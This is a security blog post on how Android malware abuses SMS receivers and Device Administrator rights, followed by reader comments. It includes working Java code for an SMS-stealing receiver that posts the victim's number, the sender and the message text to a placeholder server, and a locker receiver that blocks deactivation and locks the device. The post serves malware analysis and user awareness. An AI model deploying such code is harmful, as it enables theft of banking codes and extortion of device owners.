OFFICIAL SECURITY BLOG

Android Features Used Maliciously

July 25, 2014 | BY

We hear a lot about the sheer volume of Android malware out there. An interesting point is that the vast majority of it needs no special ‘magic’ to behave maliciously: it abuses existing, documented platform functionality that is available to every developer.

We’ll take a look at a couple of the features malware is able to use once the app is installed and its permission requests have been granted.

SMS Receivers

The first method is monitoring incoming SMS. SMS access is valuable to malware in general: it can send premium-rate messages, sign you up for paid services, send spam, and a lot more. Here we focus on the receiving side.

Let’s look at the RECEIVE_SMS permission, used heavily by banking Trojans to capture one-time authentication codes sent by text and other information related to an account. With this permission granted, the malware registers a BroadcastReceiver for the android.provider.Telephony.SMS_RECEIVED broadcast to monitor incoming SMS.

Once a message is captured, the receiver can do a variety of things: collect the sender and the contents, abort the broadcast so the user’s messaging app never shows a notification, or delete the message from the inbox. The abort trick works because SMS_RECEIVED is an ordered broadcast and a receiver with a high priority runs first. Note that from Android 4.4 (KitKat) on, only the default SMS app can write to or delete from the SMS store, and aborting the broadcast no longer hides the message from it, so this particular trick is limited to older devices.

The example here shows how a Korean bank Trojan collects an incoming SMS message, sends it to a remote server, and then aborts the broadcast so no notification is shown. The data sent includes the compromised device’s phone number, the sender’s number, and the message contents.
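The following is an added illustration of the pattern just described, written for this post; it is not the Korean Trojan’s own code. It shows what an analyst typically finds when decompiling such a sample: a manifest-registered receiver that parses the raw PDUs, builds a report containing the victim’s number, the sender and the body, posts it, and then aborts the broadcast. The package name, the class name and the collection URL (example.invalid) are placeholders.

```java
package com.example.analysis; // placeholder package, not a real sample's

import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.os.Bundle;
import android.telephony.SmsMessage;
import android.telephony.TelephonyManager;

import java.io.OutputStream;
import java.net.HttpURLConnection;
import java.net.URL;
import java.net.URLEncoder;

/**
 * Registered in AndroidManifest.xml for the action
 * android.provider.Telephony.SMS_RECEIVED with a high android:priority so that
 * it runs before the stock messaging app. Illustrative code for this post.
 */
public class SmsInterceptReceiver extends BroadcastReceiver {

    // Placeholder collection endpoint; a real sample hard-codes its C2 address.
    private static final String REPORT_URL = "http://example.invalid/sms.php";

    @Override
    public void onReceive(Context context, Intent intent) {
        Bundle extras = intent.getExtras();
        if (extras == null) return;

        // An incoming SMS arrives as one or more raw PDUs (protocol data units).
        Object[] pdus = (Object[]) extras.get("pdus");
        if (pdus == null) return;

        String sender = null;
        StringBuilder body = new StringBuilder();
        for (Object pdu : pdus) {
            SmsMessage msg = SmsMessage.createFromPdu((byte[]) pdu);
            if (sender == null) sender = msg.getOriginatingAddress();
            body.append(msg.getMessageBody()); // multipart messages are concatenated
        }

        // The victim's own number; needs READ_PHONE_STATE and may be null
        // if the SIM or carrier does not expose it.
        TelephonyManager tm =
                (TelephonyManager) context.getSystemService(Context.TELEPHONY_SERVICE);
        String ownNumber = tm.getLine1Number();

        report(ownNumber, sender, body.toString());

        // Stop the ordered broadcast so the messaging app never shows the message.
        // Only effective before Android 4.4: from KitKat on the default SMS app
        // still receives the message regardless of this call.
        abortBroadcast();
    }

    private static void report(final String own, final String from, final String text) {
        // Network I/O must leave the main thread; a receiver has only seconds
        // before the system considers it unresponsive.
        new Thread(new Runnable() {
            @Override
            public void run() {
                try {
                    String form = "phone=" + URLEncoder.encode(String.valueOf(own), "UTF-8")
                            + "&from=" + URLEncoder.encode(String.valueOf(from), "UTF-8")
                            + "&body=" + URLEncoder.encode(text, "UTF-8");
                    HttpURLConnection c =
                            (HttpURLConnection) new URL(REPORT_URL).openConnection();
                    c.setRequestMethod("POST");
                    c.setDoOutput(true);
                    OutputStream out = c.getOutputStream();
                    out.write(form.getBytes("UTF-8"));
                    out.close();
                    c.getResponseCode(); // force the request; the reply is ignored
                    c.disconnect();
                } catch (Exception ignored) {
                    // malware typically swallows failures silently
                }
            }
        }).start();
    }
}
```

When triaging an APK, the tell-tale combination in the manifest is a uses-permission for android.permission.RECEIVE_SMS (usually alongside READ_PHONE_STATE and INTERNET) plus a receiver whose intent-filter for android.provider.Telephony.SMS_RECEIVED carries an unusually high android:priority value; the priority is what lets the receiver run, and abort, before the real messaging app.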


Many legitimate apps request permission to send or receive SMS, so the request is easily overlooked at install time. The challenge is that we can’t see what goes on behind the scenes: once the permission is granted, messages can be sent, received, deleted, and their contents sniffed without our knowledge. We are left hoping that Google is keeping us secure.

Device Administrator

Another feature that gets abused is the security setting “Device Administrators.” Introduced in Android 2.2 as the Device Administration API, it was put in place to help IT departments better secure corporate Android devices. When an app is activated as a device administrator, it can enforce policies such as password strength, locking the device, and remote wipe.

When an app is an active administrator, uninstalling it takes an additional step: Android refuses to uninstall an active admin, so the app must first be deactivated under Device Administrators.

Malware authors typically use this functionality to prevent an app from being uninstalled.

In this example, Device Administrator is used to prevent uninstalling as usual, but by handling events such as the action DEVICE_ADMIN_DISABLE_REQUESTED (delivered to the app’s DeviceAdminReceiver when the user taps Deactivate), this ransomware is able to block the deactivation attempt. Even in Safe Mode, where only system apps should be started, it is able to block deactivation, making this one even more difficult to remove.
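As an added illustration (written for this post, not taken from Koler or any other sample), here is what a locker’s DeviceAdminReceiver looks like. The malicious part is the side effect of onDisableRequested: it throws a full-screen activity over the deactivation confirmation and optionally locks the device, so the user never reaches the Deactivate button. The package, class names and message text are placeholders.

```java
package com.example.analysis; // placeholder package, not a real sample's

import android.app.Activity;
import android.app.admin.DeviceAdminReceiver;
import android.app.admin.DevicePolicyManager;
import android.content.ComponentName;
import android.content.Context;
import android.content.Intent;
import android.os.Bundle;
import android.widget.TextView;

/**
 * Declared in AndroidManifest.xml as a <receiver> with
 * android:permission="android.permission.BIND_DEVICE_ADMIN", a <meta-data>
 * entry android.app.device_admin pointing at the policy XML, and an
 * intent-filter for android.app.action.DEVICE_ADMIN_ENABLED.
 * Illustrative code for this post.
 */
public class LockerAdminReceiver extends DeviceAdminReceiver {

    // Invoked for android.app.action.DEVICE_ADMIN_DISABLE_REQUESTED, i.e. when the
    // user taps "Deactivate" in Settings. The returned text is shown as a warning;
    // the activity started here covers that dialog, so deactivation never completes.
    @Override
    public CharSequence onDisableRequested(Context context, Intent intent) {
        Intent lock = new Intent(context, LockScreenActivity.class);
        lock.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK | Intent.FLAG_ACTIVITY_CLEAR_TOP);
        context.startActivity(lock);

        // Some variants also force the keyguard. lockNow() only works if the
        // policy XML declares <force-lock/>; otherwise it throws SecurityException.
        DevicePolicyManager dpm =
                (DevicePolicyManager) context.getSystemService(Context.DEVICE_POLICY_SERVICE);
        ComponentName self = new ComponentName(context, LockerAdminReceiver.class);
        if (dpm.isAdminActive(self)) {
            dpm.lockNow();
        }
        return "Deactivating this will erase all your data."; // placeholder scare text
    }

    // If deactivation ever succeeds, immediately nag for the privilege again.
    @Override
    public void onDisabled(Context context, Intent intent) {
        Intent ask = new Intent(DevicePolicyManager.ACTION_ADD_DEVICE_ADMIN);
        ask.putExtra(DevicePolicyManager.EXTRA_DEVICE_ADMIN,
                new ComponentName(context, LockerAdminReceiver.class));
        ask.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
        context.startActivity(ask);
    }

    /** Minimal full-screen "ransom note" that swallows the Back key. */
    public static class LockScreenActivity extends Activity {
        @Override
        protected void onCreate(Bundle savedInstanceState) {
            super.onCreate(savedInstanceState);
            TextView note = new TextView(this);
            note.setText("Your device has been locked."); // placeholder text
            setContentView(note);
        }

        @Override
        public void onBackPressed() {
            // intentionally empty: Back must not dismiss the locker
        }
    }
}
```

The accompanying policy file (res/xml/device_admin.xml) needs only a uses-policies element listing force-lock for lockNow() to succeed; lockers rarely request more, because any policy at all is enough to make the app an active admin and therefore uninstallable only after deactivation. When reviewing a suspicious APK, an app with a DeviceAdminReceiver that overrides onDisableRequested and starts an activity from it deserves a close look.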


Ransomware families like Koler, SimpLocker, and FBILocker are becoming more of a nuisance by incorporating methods like this, making them even more difficult to remove. Early variants did not block a user’s access to the device, so if you didn’t fall for the scam you could simply uninstall them.

You can review which installed apps are Device Administrators through your Android settings: Settings -> Security -> Device Administrators.

These are just a couple of examples of how malware uses existing Android features in malicious ways. We suggest you review permissions before installing apps and back up your data.

Give a second thought to apps requesting to be Device Administrators.


  • Jasmin

    I just want to thank you for this very shocking, informative article, Armando. However, I just wanted to ask you about one point. Based on the examples you’ve provided, the targeted device was infected with malware which turned it into a harbor for child *********** and zoophilia *********** material. I am completely shocked!!

    1) What is the purpose of infecting the device in this way? Is it used as a carrier to send this material to other targets?

    2) Isn’t there some kind of law enforcement department which tries to apprehend the network which is responsible for the illegal deeds which have been perpetrated?

    Thank you

  • Daniel

    Nice article, nice to see some code snippets of how it’s done.

  • Gil Henderson

    No Jasmin, it only pretends that is the case.

  • http://grampiantradesmen.co.uk/ rekcuskcid halla

    Where are the times when my “cellular” Siemens S6 was the size of a baby, the battery lasted two weeks and all it did was make/receive calls and texts, all right :D

  • Jasmin

    Ah, OK. I see now how things are. It is part of the malicious app’s behavior. I thought that it really did download that material onto the phone. Thank you for your clarification.

  • dale lessard

    Microsoft is controlling everything now. I can’t get Netflix or anything; I change things and they change them back. I also got hacked from a Microsoft office. I want it to stop, AND THEY JUST MADE THIS PASSWORD NOT WORK.

  • Pingback: Tech Thoughts Daily Net News – July 29, 2014 | Bill Mullins' Weblog - Tech Thoughts

  • steven sanders

    My Android phone has been blocked by FBI ransomware and I can’t use my device. Please help.